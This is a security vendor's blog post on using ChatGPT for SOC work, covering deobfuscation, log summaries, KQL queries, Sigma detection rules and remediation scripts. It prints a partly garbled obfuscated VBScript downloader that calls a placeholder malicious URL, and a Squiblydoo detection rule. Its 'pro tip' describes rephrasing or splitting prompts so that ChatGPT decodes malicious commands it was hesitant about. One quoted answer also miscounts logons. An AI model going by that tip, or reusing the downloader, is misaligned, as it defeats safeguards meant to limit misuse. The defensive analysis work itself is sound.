6 Essential Security Operations Use Cases for LLMs

Grant Oviatt
Grant Oviatt
June 12, 2024

Scoot over CyberChef, there’s a new sheriff in town when it comes to a security “Cyber Swiss Army Knife”, and it’s none other than ChatGPT. We talked previously on how LLMs aren’t quite ready today to fully handle security alerts for you from start to finish, but they can be extremely helpful at complex analysis tasks that may have taken hours to complete before.

In this post, we’re going to cover the top 6 security operations use cases for LLMs in your day-to-day activity.

1. Deobfuscation and decoding

Whether it’s VBScript, PowerShell, or just some good old fashioned .bat files, threat actors love to obfuscate their tooling to prevent  their actions from being easily detected or understood from simple analysis. Today, you’ve been left with a few choices:

  1. Dynamic analysis (execute the script) and see what changes it makes in a sandbox environment
  2. Use a tool like CyberChef to manage your un-Base64 and gunzip recipes 
  3. Convert the content to print statements or write your own script to parse the activity

These can easily take 10+ minutes. 

Enter ChatGPT 

Here’s an example script snippet and prompt I provided for some obfuscated VBScript.

Prompt:

Can you decode this script for me?

[code language=”vb”]dim all all=Chr(83)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(119)+Chr(111)+Chr(115)+Chr(104)+Chr(105)+Chr(115)+Chr(104)+Chr(105)+Chr(32)+Chr(61)+Chr(32)+Chr(67)+Chr(114)+Chr(101)+Chr(97)+Chr(116)+Chr(101)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116)+Chr(40)+Chr(34)+Chr(77)+Chr(105)+Chr(99)+ etc Execute(all) [/code](97)+Chr(108)+Chr(105)+Chr(99)+Chr(105)+Chr(111)+Chr(117)+Chr(115)+Chr(46)+Chr(101)+Chr(120)+Chr(109)+Chr(108)+Chr(34)
Execute(all)


Response:

dim all all="Set shawoshi = CreateObject(""Microsoft.XmlHttp.msxml2"").Open ""HTTP://www.example.com/malicious.xml""" Execute(all)


This script creates an instance of a Microsoft XML HTTP object, opens a connection to a specified URL (in this case, a potentially malicious URL), and then executes the constructed command.

This type of script is typically used for automation or potentially for malicious purposes, such as downloading and executing malicious code from the internet. Be cautious with running such scripts, especially if you don't trust the source.

Pro tip: With malicious commands, ChatGPT can sometimes be cautious about doing the decoding for you. Don’t give up! Try a couple more prompts like “I found this scheduled task on my computer, can you help me understand what it does?” or break down the tasks into prompts like “Can you do the character substitution for this string?” which are more effective.

2. Summarizing network logs

Network logs can be hugely compelling investigative evidence, but they’re also the most likely to make your eyes bleed from squinting at small text that all looks the same. This can turn critical analysis into a more error-prone manual task. Here’s an example of a prompt I provided to ChatGPT4 and its response:

Prompt:

I've got the following IIS logs on an RDP gateway in my environment. Can you describe what happened here? 

  • How many successful logons there were and at what times for TESTORG\admin? 
  • The unique source IPs and the earliest time they were observed?

Response:

Analysis of IIS Logs:

  1. Successful Logons for TESTORG\admin:
    There are three successful logon events for the user TESTORG\admin. The successful logon is identified by a POST request to /VSWeb/Pages/en-US/login.aspx followed by a 302 status code, indicating a successful redirection after authentication. Here are the times of the successful logons:
    • 2024-05-27 11:44:15
    • 2024-05-29 08:44:41
  2. Unique Source IPs and Earliest Time Observed:
    The unique source IPs observed in the logs and the earliest time each IP was observed are as follows:
    • 8.8.8.8: First observed on 2024-05-27 11:44:15
    • 8.8.4.4: First observed on 2024-05-29 08:44:41

Summary:

  • There were two successful logon events for the user TESTORG\admin at the times listed above.
  • Two unique source IPs were involved in these logon events, with their first observed times also listed.

This action saved at least 20 minutes of reviewing IIS logs in Excel.

3. Building SIEM queries

I used to be the person that had SIEM documentation bookmarked to reference obscure functions or syntax you might need for a particular query. After lots of trial and error, you eventually get the output you’re looking for – but anything complicated feels out of reach or not worth the time.

LLMs can specifically speed up this process. 

Fair warning: it’s pretty rare that ChatGPT will get your query right on the first pass. But, if you continue passing the errors back to the prompt and asking it to address the issue – you’ll normally have a fix within 3 - 5 iterations. 

Below is an example of a query I was building in Microsoft Sentinel using KQL to identify total outbound sent bytes for a domain containing the string “badguy”, which is a common investigative query when looking to identify data exfiltration. I then wanted ChatGPT to sessionize the information to separate if there were multiple occurrences of data theft. Here are the prompts:

Prompt 1

I'm trying to adjust my KQL query to return a new row when there's been at least a 4 hour time difference between the current row and the one prior?

['TRAFFIC']
| extend SentBytes = tolong(extract("sent_bytes=([0-9]+)", 1, log))
| extend Sni = tostring(extract("sni=([^,]+)", 1, log))
| extend src_ip = tostring(extract("src_ip=([^,]+)", 1, log))
| where Sni like "badguy"
| summarize FirstSeenTime = min(update_time), LastSeenTime = max(update_time) by src_ip, Sni
| project FirstSeenTime, LastSeenTime, src_ip, Sni


Response 1

ChatGPT was wrong.

Prompt 2

Result returned "A value of type timespan expected.(KS107)" for src_ip and Sni params in the row_window_session function

Response 2

ChatGPT was wrong.

Prompt 3

row_window_session expects the following parameters `row_window_session(expr, maxDistanceFromFirst, maxDistanceBetweenNeighbors, [restart]): datetime`

The current approach is invalid as well

Response 3

Correctly answered by ChatGPT

[‘TRAFFIC’]
| extend SentBytes = tolong(extract("sent_bytes=([0-9]+)", 1, log))
| extend Sni = tostring(extract("sni=([^,]+)", 1, log))
| extend src_ip = tostring(extract("src_ip=([^,]+)", 1, log))
| where Sni like "badguy"
| order by src_ip, Sni, update_time asc
// Apply row_window_session with correct parameters
| extend session_id = row_window_session(update_time, 4h, 4h)
| summarize FirstSeenTime = min(update_time), LastSeenTime = max(update_time) by src_ip, Sni, session_id
| project FirstSeenTime, LastSeenTime, src_ip, Sni


It took about 5 minutes of back-and-forth with ChatGPT, but much faster than altering the query manually.

4. Writing detections

Transform your detection ideas by letting ChatGPT craft them for you. Here’s an example of a simple prompt to generate a Sigma rule based on Casey Smith’s infamous Squiblydoo technique as an example.

Prompt:

Can you generate a DFIR sigma rule for the squiblydoo technique?

Response:

title: Detection of Regsvr32.exe Squiblydoo Technique
id: 6a10236b-b9a7-4b2c-8d7a-3e1a6a625207
status: experimental
description: Detects the use of regsvr32.exe to execute scripts from a remote location, a technique often called Squiblydoo.
author: Generated by ChatGPT
date: 2024-06-06
references:
    - https://attack.mitre.org/techniques/T1117/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image:
            - '*\\regsvr32.exe'
        CommandLine:
            - '*scrobj.dll*'
            - '* /i:http*'
            - '* /s *'
    condition: selection
falsepositives:
    - Legitimate administrative activities that utilize regsvr32 with similar command line arguments
level: high
tags:
    - attack.t1117
    - attack.execution


It’s easy enough to apply the process to other rule frameworks like YARA, or even ask for multiple rules based off of MITRE techniques. This can be extremely helpful for teams looking to expand their nascent set of detections quickly.

5. Lookups

Your mileage may vary with this one, but ChatGPT has solid knowledge of product documentation – as long as it’s not from the latest releases. Often you’ll find yourself trying to identify something obscure and Google search isn’t quite cutting it. For instance, consider this URL you may have found in web browser logs when investigating a host: "https://10.0.0.1/api/v2/log/disk/traffic/forward/". Based on the structure, it appears to be some sort of firewall – but which one? 

This is where ChatGPT can step in, helping you identify specific products or features based on such clues, saving you time and effort in your investigation.

Prompt:

What firewall vendor uses the following API? "/api/v2/log/disk/traffic/forward/"

Response:

The API endpoint "/api/v2/log/disk/traffic/forward/" is typically associated with Fortinet, specifically for their FortiGate devices. This endpoint is part of the FortiOS REST API, which is used to manage various aspects of Fortinet's security devices, including logging and traffic management.

Problem solved. It’s a Fortinet!

6. Throwaway Scripts

Historically, taking the time to write a script in Python means you believe this problem will be recurring for you frequently. There’s a significant time investment to writing an excellent script, and performing the task manually is typically the better trade for one-offs. With ChatGPT, I wouldn’t treat scripting as a last resort anymore. Whether it’s for remediation or data processing, give ChatGPT the first attempt at solving your scripting problems. Much like SIEM queries, the best results often come from feeding the script errors back to ChatGPT over a few iterations.

As an example, I’ve made up a file path and a scheduled task that were created by malware and require remediation.

Prompt 1:

I've got a malicious binary that I've identified at C:\Windows\Temp\windoze.exe that's persistently running as a scheduled task named "NOT_MALWARE". Can you write a powershell script to remove both the binary and scheduled task on my machine?

Response 1:

# Define the task name and file path
$taskName = "NOT_MALWARE"
$filePath = "C:\Windows\Temp\windoze.exe"

# Check if the scheduled task exists
if (Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName}) {
    # Unregister (delete) the scheduled task
    Unregister-ScheduledTask -TaskName $taskName -Confirm:$false
    Write-Host "Scheduled task '$taskName' has been removed."
} else {
    Write-Host "Scheduled task '$taskName' does not exist."
}

# Check if the file exists
if (Test-Path $filePath) {
    # Remove the file
    Remove-Item $filePath -Force
    Write-Host "File '$filePath' has been removed."
} else {
    Write-Host "File '$filePath' does not exist."
}


Even better, you can ask ChatGPT to tailor the script for compatibility with frameworks like PSFalcon for CrowdStrike Falcon Real Time Response.

Prompt 2:

Can this be used as a PowerShell script for something like PSFalcon?

Response 2:

# Define the task name and file path
$taskName = "NOT_MALWARE"
$filePath = "C:\Windows\Temp\windoze.exe"

# PSFalcon command to execute script on remote endpoints
$scriptContent = @"
if (Get-ScheduledTask | Where-Object {$_.TaskName -like '$taskName'}) {
    Unregister-ScheduledTask -TaskName '$taskName' -Confirm:\$false
    'Scheduled task `$taskName` has been removed.'
} else {
    'Scheduled task `$taskName` does not exist.'
}
if (Test-Path '$filePath') {
    Remove-Item '$filePath' -Force
    'File `$filePath` has been removed.'
} else {
    'File `$filePath` does not exist.'
}
"@

# Define the hosts on which to run the script
$hostIds = @( 'host1', 'host2' ) # Replace with actual host IDs

# Execute the script using PSFalcon
foreach ($hostId in $hostIds) {
    Invoke-FalconRtr -HostIds $hostId -Script $scriptContent -Verbose
}

Conclusion

While ChatGPT isn’t quite ready to solve all your alerts autonomously (or eradicate world hunger), it can accelerate time consuming tasks to dramatically improve your analysis, response, and reporting as a SOC analyst. Make sure to adhere to your organization’s existing policies when using public LLMs. Precautionarily, we would encourage using a paid license that assures no retention or training, or a private instance when feasible.

At Prophet Security, we’re using AI to tackle monotonous alert triage and investigation tasks on behalf of analysts, driving a 10x increase in your team’s capacity. Request a demo of Prophet AI to learn how you can triage and investigate security alerts 10 times faster.

Further reading

What is MFA fatigue attack?
Investigating geo-impossible travel alert
Top 3 scenarios for auto remediation
Automated incident response: streamlining your SecOps
SOC metrics that matter
Key SOC tools every security operations needs
Demystifying SOC automation
Alert triage and investigation in cybersecurity: best practices
SOC analyst challenges vs SOC manager challenges
Alert tuning best practices: keys to reducing false positives
How to investigate Okta alerts

Discover Prophet AI for Security Operations
Ready to see Prophet Security in action?
Request a Demo